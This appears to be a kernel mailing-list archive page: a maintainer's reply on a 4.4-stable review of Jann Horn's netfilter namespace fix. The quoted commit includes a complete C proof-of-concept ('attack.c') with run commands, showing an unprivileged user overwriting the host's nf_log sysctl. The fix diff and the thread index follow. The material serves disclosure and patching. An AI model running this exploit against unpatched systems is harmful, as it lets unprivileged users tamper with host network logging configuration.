From: Pablo Neira Ayuso <pablo@netfilter.org>
To: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Cc: linux-kernel@vger.kernel.org, stable@vger.kernel.org,
Jann Horn <jann@thejh.net>
Subject: Re: [PATCH 4.4 38/38] netfilter: fix namespace handling in nf_log_proc_dostring
Date: Thu, 17 Nov 2016 12:03:48 +0100 [thread overview]
Message-ID: <20161117110348.GA3222@salvia> (raw)
In-Reply-To: <20161117103238.093810832@linuxfoundation.org>
Greg,
Thanks a lot for picking up this one!
I have more stable stuff for netfilter, I can prepare a batch for you.
I'll keep it small and only urgent stuff.
Let me know if that's fine with you.
On Thu, Nov 17, 2016 at 11:33:16AM +0100, Greg Kroah-Hartman wrote:
> 4.4-stable review patch. If anyone has any objections, please let me know.
>
> ------------------
>
> From: Jann Horn <jann@thejh.net>
>
> commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.
>
> nf_log_proc_dostring() used current's network namespace instead of the one
> corresponding to the sysctl file the write was performed on. Because the
> permission check happens at open time and the nf_log files in namespaces
> are accessible for the namespace owner, this can be abused by an
> unprivileged user to effectively write to the init namespace's nf_log
> sysctls.
>
> Stash the "struct net *" in extra2 - data and extra1 are already used.
>
> Repro code:
>
> #define _GNU_SOURCE
> #include <stdlib.h>
> #include <sched.h>
> #include <err.h>
> #include <sys/mount.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <fcntl.h>
> #include <unistd.h>
> #include <string.h>
> #include <stdio.h>
>
> char child_stack[1000000];
>
> uid_t outer_uid;
> gid_t outer_gid;
> int stolen_fd = -1;
>
> void writefile(char *path, char *buf) {
> int fd = open(path, O_WRONLY);
> if (fd == -1)
> err(1, "unable to open thing");
> if (write(fd, buf, strlen(buf)) != strlen(buf))
> err(1, "unable to write thing");
> close(fd);
> }
>
> int child_fn(void *p_) {
> if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
> NULL))
> err(1, "mount");
>
> /* Yes, we need to set the maps for the net sysctls to recognize us
> * as namespace root.
> */
> char buf[1000];
> sprintf(buf, "0 %d 1\n", (int)outer_uid);
> writefile("/proc/1/uid_map", buf);
> writefile("/proc/1/setgroups", "deny");
> sprintf(buf, "0 %d 1\n", (int)outer_gid);
> writefile("/proc/1/gid_map", buf);
>
> stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
> if (stolen_fd == -1)
> err(1, "open nf_log");
> return 0;
> }
>
> int main(void) {
> outer_uid = getuid();
> outer_gid = getgid();
>
> int child = clone(child_fn, child_stack + sizeof(child_stack),
> CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
> |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
> if (child == -1)
> err(1, "clone");
> int status;
> if (wait(&status) != child)
> err(1, "wait");
> if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
> errx(1, "child exit status bad");
>
> char *data = "NONE";
> if (write(stolen_fd, data, strlen(data)) != strlen(data))
> err(1, "write");
> return 0;
> }
>
> Repro:
>
> $ gcc -Wall -o attack attack.c -std=gnu99
> $ cat /proc/sys/net/netfilter/nf_log/2
> nf_log_ipv4
> $ ./attack
> $ cat /proc/sys/net/netfilter/nf_log/2
> NONE
>
> Because this looks like an issue with very low severity, I'm sending it to
> the public list directly.
>
> Signed-off-by: Jann Horn <jann@thejh.net>
> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
>
> ---
> net/netfilter/nf_log.c | 6 ++++--
> 1 file changed, 4 insertions(+), 2 deletions(-)
>
> --- a/net/netfilter/nf_log.c
> +++ b/net/netfilter/nf_log.c
> @@ -401,7 +401,7 @@ static int nf_log_proc_dostring(struct c
> size_t size = *lenp;
> int r = 0;
> int tindex = (unsigned long)table->extra1;
> - struct net *net = current->nsproxy->net_ns;
> + struct net *net = table->extra2;
>
> if (write) {
> if (size > sizeof(buf))
> @@ -453,7 +453,6 @@ static int netfilter_log_sysctl_init(str
> 3, "%d", i);
> nf_log_sysctl_table[i].procname =
> nf_log_sysctl_fnames[i];
> - nf_log_sysctl_table[i].data = NULL;
> nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
> nf_log_sysctl_table[i].mode = 0644;
> nf_log_sysctl_table[i].proc_handler =
> @@ -463,6 +462,9 @@ static int netfilter_log_sysctl_init(str
> }
> }
>
> + for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
> + table[i].extra2 = net;
> +
> net->nf.nf_log_dir_header = register_net_sysctl(net,
> "net/netfilter/nf_log",
> table);
>
>
next prev parent reply other threads:[~2016-11-17 11:04 UTC|newest]
Thread overview: 37+ messages / expand[flat|nested] mbox.gz Atom feed top
2016-11-17 10:32 [PATCH 4.4 00/38] 4.4.33-stable review Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 01/38] ALSA: info: Return error for invalid read/write Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 02/38] ALSA: info: Limit the proc text input size Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 03/38] ASoC: cs4270: fix DAPM stream name mismatch Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 05/38] swapfile: fix memory corruption via malformed swapfile Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 06/38] coredump: fix unfreezable coredumping task Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 07/38] s390/hypfs: Use get_free_page() instead of kmalloc to ensure page alignment Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 08/38] ARC: timer: rtc: implement read loop in "C" vs. inline asm Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 09/38] pinctrl: cherryview: Serialize register access in suspend/resume Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 10/38] pinctrl: cherryview: Prevent possible interrupt storm on resume Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 11/38] staging: iio: ad5933: avoid uninitialized variable in error case Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 12/38] drivers: staging: nvec: remove bogus reset command for PS/2 interface Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 13/38] Revert "staging: nvec: ps2: change serio type to passthrough" Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 14/38] staging: nvec: remove managed resource from PS2 driver Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 15/38] USB: cdc-acm: fix TIOCMIWAIT Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 17/38] drbd: Fix kernel_sendmsg() usage - potential NULL deref Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 18/38] toshiba-wmi: Fix loading the driver on non Toshiba laptops Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 19/38] clk: qoriq: Dont allow CPU clocks higher than starting value Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 20/38] iio: hid-sensors: Increase the precision of scale to fix wrong reading interpretation Greg Kroah-Hartman
2016-11-17 10:32 ` [PATCH 4.4 21/38] iio: orientation: hid-sensor-rotation: Add PM function (fix non working driver) Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 22/38] scsi: qla2xxx: Fix scsi scan hang triggered if adapter fails during init Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 23/38] scsi: mpt3sas: Fix for block device of raid exists even after deleting raid disk Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 26/38] dmaengine: at_xdmac: fix spurious flag status for mem2mem transfers Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 28/38] iommu/amd: Free domain id when free a domain of struct dma_ops_domain Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 29/38] iommu/vt-d: Fix dead-locks in disable_dmar_iommu() path Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 30/38] mei: bus: fix received data size check in NFC fixup Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 31/38] lib/genalloc.c: start search from start of chunk Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 32/38] hwrng: core - Dont use a stack buffer in add_early_randomness() Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 33/38] i40e: fix call of ndo_dflt_bridge_getlink() Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 34/38] ACPI / APEI: Fix incorrect return value of ghes_proc() Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 35/38] ASoC: sun4i-codec: return error code instead of NULL when create_card fails Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 36/38] mmc: mxs: Initialize the spinlock prior to using it Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 37/38] btrfs: qgroup: Prevent qgroup->reserved from going subzero Greg Kroah-Hartman
2016-11-17 10:33 ` [PATCH 4.4 38/38] netfilter: fix namespace handling in nf_log_proc_dostring Greg Kroah-Hartman
2016-11-17 11:03 ` Pablo Neira Ayuso [this message]
2016-11-17 12:01 ` Greg Kroah-Hartman
2016-11-17 22:22 ` [PATCH 4.4 00/38] 4.4.33-stable review Guenter Roeck
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20161117110348.GA3222@salvia \
--to=pablo@netfilter.org \
--cc=gregkh@linuxfoundation.org \
--cc=jann@thejh.net \
--cc=linux-kernel@vger.kernel.org \
--cc=stable@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).